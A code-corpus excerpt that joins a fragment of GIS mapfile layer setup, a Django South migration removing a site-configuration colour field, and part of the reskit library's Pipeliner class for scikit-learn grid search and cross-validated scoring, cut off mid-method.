layer.type = MS_LAYER_RASTER
layer.name = layerName
layer.units = MS_PIXELS
layer.status = MS_OFF
layer.setProjection("init=epsg:%s"%georefTargetSRS)
self.mapfile.insertLayer(layer)
| gpl-3.0 | 5,549,427,881,581,592,000 | 35.074074 | 116 | 0.641684 | false |
holgerd77/django-public-project | public_project/south_migrations/0023_auto__del_field_siteconfig_navi_link_color.py | 1 | 21861 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'SiteConfig.navi_link_color'
db.delete_column(u'public_project_siteconfig', 'navi_link_color')
def backwards(self, orm):
# Adding field 'SiteConfig.navi_link_color'
db.add_column(u'public_project_siteconfig', 'navi_link_color',
self.gf('django.db.models.fields.CharField')(default='#FFFFFF', max_length=7),
keep_default=False)
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'public_project.activitylog': {
'Meta': {'ordering': "['-date']", 'object_name': 'ActivityLog'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
u'public_project.comment': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'Comment'},
'activation_hash': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '250'}),
'feedback_allowed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'published_by': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.commentrelation': {
'Meta': {'object_name': 'CommentRelation'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Comment']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'page': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'public_project.document': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'Document'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'document': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'events': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Event']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'pdf_images_generated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.event': {
'Meta': {'ordering': "['-date']", 'object_name': 'Event'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'event_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'important': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_events'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_events'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.image': {
'Meta': {'ordering': "['title']", 'object_name': 'Image'},
'attribution': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'attribution_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.membership': {
'Meta': {'object_name': 'Membership'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'from_participant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_memberships'", 'to': u"orm['public_project.Participant']"}),
'function': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'to_participant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_memberships'", 'to': u"orm['public_project.Participant']"})
},
u'public_project.page': {
'Meta': {'ordering': "['number']", 'object_name': 'Page'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.db.models.fields.IntegerField', [], {})
},
u'public_project.participant': {
'Meta': {'ordering': "['order', 'name']", 'object_name': 'Participant'},
'belongs_to': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['public_project.Participant']", 'through': u"orm['public_project.Membership']", 'symmetrical': 'False'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '500', 'null': 'True', 'blank': 'True'})
},
u'public_project.projectgoal': {
'Meta': {'ordering': "['order']", 'object_name': 'ProjectGoal'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '100', 'null': 'True', 'blank': 'True'}),
'performance_figure': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'project_goal_group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ProjectGoalGroup']"})
},
u'public_project.projectgoalgroup': {
'Meta': {'object_name': 'ProjectGoalGroup'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Event']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_current': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'project_part': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ProjectPart']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.projectpart': {
'Meta': {'ordering': "['order', 'name']", 'object_name': 'ProjectPart'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'main_project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '500', 'null': 'True', 'blank': 'True'})
},
u'public_project.question': {
'Meta': {'ordering': "['title']", 'object_name': 'Question'},
'answer': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'answered': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'documents': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Document']"}),
'events': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Event']"}),
'explanations': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.researchrequest': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'ResearchRequest'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nr': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'open': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.researchrequestrelation': {
'Meta': {'object_name': 'ResearchRequestRelation'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'page': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'research_request': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ResearchRequest']"})
},
u'public_project.searchtag': {
'Meta': {'ordering': "['order']", 'object_name': 'SearchTag'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '100', 'null': 'True', 'blank': 'True'})
},
u'public_project.searchtagcacheentry': {
'Meta': {'ordering': "['-num_results']", 'object_name': 'SearchTagCacheEntry'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'num_results': ('django.db.models.fields.IntegerField', [], {}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.SearchTag']"})
},
u'public_project.sitecategory': {
'Meta': {'object_name': 'SiteCategory'},
'category': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'documents': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_site_categories'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'public_project.siteconfig': {
'Meta': {'object_name': 'SiteConfig'},
'about_text': ('django.db.models.fields.TextField', [], {'default': "u'About text'"}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'contact_text': ('django.db.models.fields.TextField', [], {'default': "u'This text will be shown on the contact page.'"}),
'footer': ('django.db.models.fields.TextField', [], {'default': "u'This text will be shown in the footer of the site.'"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro_text': ('django.db.models.fields.TextField', [], {'default': "u'This is a project watch website.'"}),
'short_title': ('django.db.models.fields.CharField', [], {'default': "u'ProjectWatch'", 'max_length': '250'}),
'title': ('django.db.models.fields.CharField', [], {'default': "u'ProjectWatch'", 'max_length': '250'}),
'title_color': ('django.db.models.fields.CharField', [], {'default': "'#990000'", 'max_length': '7'})
},
u'public_project.userprofile': {
'Meta': {'object_name': 'UserProfile'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'receive_new_comment_emails': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'public_project.websource': {
'Meta': {'ordering': "['order']", 'object_name': 'WebSource'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '100', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['public_project'] | bsd-3-clause | -2,835,805,165,672,189,400 | 81.18797 | 227 | 0.558803 | false |
neuro-ml/reskit | reskit/core.py | 1 | 21723 | """ Core classes. """
from sklearn.externals.joblib import Parallel, delayed
from sklearn.model_selection import cross_val_score, cross_val_predict
from sklearn.model_selection import GridSearchCV
from sklearn.metrics.scorer import check_scoring
from sklearn.pipeline import Pipeline
from sklearn.base import TransformerMixin, BaseEstimator
from collections import OrderedDict
from itertools import product
from pandas import DataFrame
from pickle import dump, load
from numpy import mean, std, hstack, vstack, zeros, array
from time import time
import os
class Pipeliner(object):
"""
An object which allows you to test different data preprocessing
pipelines and prediction models at once.
    You will need to specify the name of each preprocessing and prediction
    step and the possible objects performing each step. Then Pipeliner will
    combine these steps into different pipelines, excluding forbidden
    combinations; perform experiments according to these steps and present
    the results in a convenient CSV table. For example, for each pipeline's
    classifier, Pipeliner will run a grid search on cross-validation to find the best
classifier's parameters and report metric mean and std for each tested
pipeline. Pipeliner also allows you to cache interim calculations to
avoid unnecessary recalculations.
Parameters
----------
steps : list of tuples
List of (step_name, transformers) tuples, where transformers is a
list of tuples (step_transformer_name, transformer). ``Pipeliner``
will create ``plan_table`` from this ``steps``, combining all
possible combinations of transformers, switching transformers on
each step.
eval_cv : int, cross-validation generator or an iterable, optional
Determines the evaluation cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross validation,
- integer, to specify the number of folds in a ``(Stratified)KFold``,
- An object to be used as cross-validation generator.
- A list or iterable yielding train, test splits.
For integer/None inputs, if the estimator is a classifier and ``y``
is either binary or multiclass, ``StratifiedKFold`` is used. In all
other cases, ``KFold`` is used.
        Refer to the scikit-learn ``User Guide`` for the various
        cross-validation strategies that can be used here.
grid_cv : int, cross-validation generator or an iterable, optional
Determines the grid search cross-validation splitting strategy.
Possible inputs for cv are the same as for ``eval_cv``.
param_grid : dict of dictionaries
        Dictionary with classifier names (strings) as keys. The keys are
        the possible classifier names from ``steps``. Each key maps to
        that classifier's grid search parameters.
banned_combos : list of tuples
List of (transformer_name_1, transformer_name_2) tuples. Each row
with both transformers will be removed from ``plan_table``.
Attributes
----------
plan_table : pandas DataFrame
Plan of pipelines evaluation. Created from ``steps``.
named_steps: dict of dictionaries
Dictionary with steps names as keys. Each key corresponds to
dictionary with transformers names from ``steps`` as keys.
You can get any transformer object from this dictionary.
Examples
--------
>>> from sklearn.datasets import make_classification
>>> from sklearn.preprocessing import StandardScaler
>>> from sklearn.preprocessing import MinMaxScaler
>>> from sklearn.model_selection import StratifiedKFold
>>> from sklearn.linear_model import LogisticRegression
>>> from sklearn.svm import SVC
>>> from reskit.core import Pipeliner
>>> X, y = make_classification()
>>> scalers = [('minmax', MinMaxScaler()), ('standard', StandardScaler())]
>>> classifiers = [('LR', LogisticRegression()), ('SVC', SVC())]
>>> steps = [('Scaler', scalers), ('Classifier', classifiers)]
>>> grid_cv = StratifiedKFold(n_splits=5, shuffle=True, random_state=0)
>>> eval_cv = StratifiedKFold(n_splits=5, shuffle=True, random_state=1)
>>> param_grid = {'LR' : {'penalty' : ['l1', 'l2']},
>>> 'SVC' : {'kernel' : ['linear', 'poly', 'rbf', 'sigmoid']}}
>>> pipe = Pipeliner(steps, eval_cv=eval_cv, grid_cv=grid_cv, param_grid=param_grid)
>>> pipe.get_results(X=X, y=y, scoring=['roc_auc'])
"""
def __init__(self, steps, grid_cv, eval_cv, param_grid=dict(),
banned_combos=list()):
steps = OrderedDict(steps)
columns = list(steps)
for column in columns:
steps[column] = OrderedDict(steps[column])
def accept_from_banned_combos(row_keys, banned_combo):
if set(banned_combo) - set(row_keys) == set():
return False
else:
return True
column_keys = [list(steps[column]) for column in columns]
plan_rows = list()
for row_keys in product(*column_keys):
accept = list()
for bnnd_cmb in banned_combos:
accept += [accept_from_banned_combos(row_keys, bnnd_cmb)]
if all(accept):
row_of_plan = OrderedDict()
for column, row_key in zip(columns, row_keys):
row_of_plan[column] = row_key
plan_rows.append(row_of_plan)
self.plan_table = DataFrame().from_dict(plan_rows)[columns]
self.named_steps = steps
self.eval_cv = eval_cv
self.grid_cv = grid_cv
self.param_grid = param_grid
self._cached_X = OrderedDict()
self.best_params = dict()
self.scores = dict()
def get_results(self, X, y=None, caching_steps=list(), scoring='accuracy',
logs_file='results.log', collect_n=None):
"""
Gives results dataframe by defined pipelines.
Parameters
----------
X : array-like
            The data to fit. Can be, for example, a list, an array of at
            least two dimensions, or a dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
caching_steps : list of strings
            Steps which won't be recalculated for each new pipeline.
            If the previous pipeline shares the same leading steps,
            ``Pipeliner`` reuses the cached results and starts from the
            first step that differs.
scoring : string, callable or None, default=None
A string (see model evaluation documentation) or a scorer
callable object / function with signature
``scorer(estimator, X, y)``. If None, the score method of
the estimator is used.
logs_file : string
File name where logs will be saved.
        collect_n : int, optional
            If not None, evaluation scores are collected over ``collect_n``
            repeated cross-validation runs. Each collected score is the
            metric computed on the out-of-fold predictions of one run;
            only the cross-validation random state changes between runs
            (it is shifted by one each time).
Returns
-------
results : DataFrame
Dataframe with all results about pipelines.
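
        Examples
        --------
        A hedged sketch reusing the ``pipe`` object from the class
        docstring example; outputs of the ``'Scaler'`` step are cached
        across pipelines:

        >>> results = pipe.get_results(X, y, caching_steps=['Scaler'],
        ...                            scoring=['roc_auc', 'accuracy'])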
"""
if isinstance(scoring, str):
scoring = [scoring]
columns = list(self.plan_table.columns)
without_caching = [step for step in columns
if step not in caching_steps]
for metric in scoring:
grid_steps = ['grid_{}_mean'.format(metric),
'grid_{}_std'.format(metric),
'grid_{}_best_params'.format(metric)]
eval_steps = ['eval_{}_mean'.format(metric),
'eval_{}_std'.format(metric),
'eval_{}_scores'.format(metric)]
columns += grid_steps + eval_steps
results = DataFrame(columns=columns)
columns = list(self.plan_table.columns)
results[columns] = self.plan_table
with open(logs_file, 'w+') as logs:
N = len(self.plan_table.index)
for idx in self.plan_table.index:
print('Line: {}/{}'.format(idx + 1, N))
logs.write('Line: {}/{}\n'.format(idx + 1, N))
logs.write('{}\n'.format(str(self.plan_table.loc[idx])))
row = self.plan_table.loc[idx]
caching_keys = list(row[caching_steps].values)
time_point = time()
X_featured, y = self.transform_with_caching(X, y, caching_keys)
spent_time = round(time() - time_point, 3)
logs.write('Got Features: {} sec\n'.format(spent_time))
for metric in scoring:
logs.write('Scoring: {}\n'.format(metric))
ml_keys = list(row[without_caching].values)
time_point = time()
grid_res = self.get_grid_search_results(X_featured, y,
ml_keys,
metric)
spent_time = round(time() - time_point, 3)
logs.write('Grid Search: {} sec\n'.format(spent_time))
logs.write('Grid Search Results: {}\n'.format(grid_res))
for key, value in grid_res.items():
results.loc[idx][key] = value
time_point = time()
scores = self.get_scores(X_featured, y,
ml_keys,
metric,
collect_n)
spent_time = round(time() - time_point, 3)
logs.write('Got Scores: {} sec\n'.format(spent_time))
mean_key = 'eval_{}_mean'.format(metric)
scores_mean = mean(scores)
results.loc[idx][mean_key] = scores_mean
logs.write('Scores mean: {}\n'.format(scores_mean))
std_key = 'eval_{}_std'.format(metric)
scores_std = std(scores)
results.loc[idx][std_key] = scores_std
logs.write('Scores std: {}\n'.format(scores_std))
scores_key = 'eval_{}_scores'.format(metric)
results.loc[idx][scores_key] = str(scores)
logs.write('Scores: {}\n\n'.format(str(scores)))
return results
def transform_with_caching(self, X, y, row_keys):
"""
Transforms ``X`` with caching.
Parameters
----------
X : array-like
            The data to fit. Can be, for example, a list, an array of at
            least two dimensions, or a dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
row_keys : list of strings
            List of transformer names. ``Pipeliner`` takes
            transformers from ``named_steps`` using keys from
            ``row_keys`` and creates a pipeline to transform the data.
Returns
-------
        transformed_data : (X, y) tuple, where X and y are array-like
            The data transformed by the pipeline built from ``row_keys``,
            returned as an (X, y) tuple.
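
        Examples
        --------
        A hedged sketch (``row_keys`` name the transformers of the
        leading caching steps, in ``plan_table`` column order):

        >>> X_t, y = pipe.transform_with_caching(X, y, ['minmax'])
        >>> X_t, y = pipe.transform_with_caching(X, y, ['minmax'])  # cache hit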
"""
columns = list(self.plan_table.columns[:len(row_keys)])
def remove_unmatched_caching_X(row_keys):
cached_keys = list(self._cached_X)
unmatched_caching_keys = cached_keys.copy()
for row_key, cached_key in zip(row_keys, cached_keys):
if not row_key == cached_key:
break
unmatched_caching_keys.remove(row_key)
for unmatched_caching_key in unmatched_caching_keys:
del self._cached_X[unmatched_caching_key]
def transform_X_from_last_cached(row_keys, columns):
prev_key = list(self._cached_X)[-1]
for row_key, column in zip(row_keys, columns):
transformer = self.named_steps[column][row_key]
X = self._cached_X[prev_key]
self._cached_X[row_key] = transformer.fit_transform(X)
prev_key = row_key
if 'init' not in self._cached_X:
self._cached_X['init'] = X
transform_X_from_last_cached(row_keys, columns)
else:
row_keys = ['init'] + row_keys
columns = ['init'] + columns
remove_unmatched_caching_X(row_keys)
cached_keys = list(self._cached_X)
cached_keys_length = len(cached_keys)
for i in range(cached_keys_length):
del row_keys[0]
del columns[0]
transform_X_from_last_cached(row_keys, columns)
last_cached_key = list(self._cached_X)[-1]
return self._cached_X[last_cached_key], y
def get_grid_search_results(self, X, y, row_keys, scoring):
"""
Make grid search for pipeline, created from ``row_keys`` for
defined ``scoring``.
Parameters
----------
X : array-like
            The data to fit. Can be, for example, a list, an array of at
            least two dimensions, or a dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
row_keys : list of strings
            List of transformer names. ``Pipeliner`` takes transformers
            from ``named_steps`` using keys from ``row_keys`` and creates
            a pipeline to transform the data.
scoring : string, callable or None, default=None
A string (see model evaluation documentation) or a scorer
callable object / function with signature
``scorer(estimator, X, y)``. If None, the score method of the
estimator is used.
Returns
-------
results : dict
            Dictionary with keys 'grid_{}_mean', 'grid_{}_std' and
            'grid_{}_best_params', where '{}' is replaced by the
            corresponding scoring name.
"""
classifier_key = row_keys[-1]
if classifier_key in self.param_grid:
columns = list(self.plan_table.columns)[-len(row_keys):]
steps = list()
for row_key, column in zip(row_keys, columns):
steps.append((row_key, self.named_steps[column][row_key]))
param_grid = dict()
for key, value in self.param_grid[classifier_key].items():
param_grid['{}__{}'.format(classifier_key, key)] = value
grid_clf = GridSearchCV(estimator=Pipeline(steps),
param_grid=param_grid,
scoring=scoring,
n_jobs=-1,
cv=self.grid_cv)
grid_clf.fit(X, y)
best_params = dict()
classifier_key_len = len(classifier_key)
for key, value in grid_clf.best_params_.items():
key = key[classifier_key_len + 2:]
best_params[key] = value
param_key = ''.join(row_keys) + str(scoring)
self.best_params[param_key] = best_params
results = dict()
for i, params in enumerate(grid_clf.cv_results_['params']):
if params == grid_clf.best_params_:
k = 'grid_{}_mean'.format(scoring)
results[k] = grid_clf.cv_results_['mean_test_score'][i]
k = 'grid_{}_std'.format(scoring)
results[k] = grid_clf.cv_results_['std_test_score'][i]
k = 'grid_{}_best_params'.format(scoring)
results[k] = str(best_params)
return results
else:
param_key = ''.join(row_keys) + str(scoring)
self.best_params[param_key] = dict()
results = dict()
results['grid_{}_mean'.format(scoring)] = 'NaN'
results['grid_{}_std'.format(scoring)] = 'NaN'
results['grid_{}_best_params'.format(scoring)] = 'NaN'
return results
def get_scores(self, X, y, row_keys, scoring, collect_n=None):
"""
Gives scores for prediction on cross-validation.
Parameters
----------
X : array-like
            The data to fit. Can be, for example, a list, an array of at
            least two dimensions, or a dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
row_keys : list of strings
            List of transformer names. ``Pipeliner`` takes transformers
            from ``named_steps`` using keys from ``row_keys`` and creates
            a pipeline to transform the data.
scoring : string, callable or None, default=None
A string (see model evaluation documentation) or a scorer
callable object / function with signature
``scorer(estimator, X, y)``. If None, the score method of the
estimator is used.
        collect_n : int, optional
            If not None, cross-validated prediction is repeated
            ``collect_n`` times, shifting the cross-validation random
            state by one on each repeat; one score is returned per repeat.
Returns
-------
scores : array-like
Scores calculated on cross-validation.
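
        Examples
        --------
        A hedged sketch (assumes a grid search has already populated
        ``best_params`` for this pipeline and metric):

        >>> scores = pipe.get_scores(X, y, ['minmax', 'LR'], 'roc_auc',
        ...                          collect_n=10)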
"""
columns = list(self.plan_table.columns)[-len(row_keys):]
param_key = ''.join(row_keys) + str(scoring)
steps = list()
for row_key, column in zip(row_keys, columns):
steps.append((row_key, self.named_steps[column][row_key]))
